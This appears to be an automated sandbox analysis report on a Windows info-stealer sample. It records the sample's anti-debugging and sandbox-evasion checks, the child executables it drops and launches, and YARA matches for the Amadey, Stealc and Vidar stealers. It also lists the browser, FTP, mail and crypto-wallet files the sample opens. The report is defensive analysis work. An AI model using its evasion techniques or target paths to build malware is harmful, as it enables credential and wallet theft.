Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

Code function: 5_2_04F80A26 rdtsc

5_2_04F80A26

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0041ACFA

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000

0_2_00404610

Source: C:\Users\user\Desktop\file.exe

0_2_004195E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h]

0_2_00419160

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter,	0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041A718
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C5BB66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C5BB1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C76AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_004190A0

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

Source: RoamingCBFCFBFBFB.exe, RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: Program Manager
Source: explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: >Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5BB341 cpuid

0_2_6C5BB341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00417630

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ee7a49fbf0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\ee7a49fbf0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00417420

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004172F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004174D0

Source: Amcache.hve.13.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 14.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.2270021811.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2298982313.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2307792347.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2298393028.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2263477354.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3273644345.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2269241540.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.2655374647.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2339495217.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2338863000.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2309993575.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3280286776.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2310315083.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2654668083.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2237950583.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2283696962.0000000000751000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: passphrase.json
Source: file.exe	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe	String found in binary or memory: \Ethereum\
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: Ethereum
Source: file.exe	String found in binary or memory: file__0.localstorage
Source: file.exe	String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

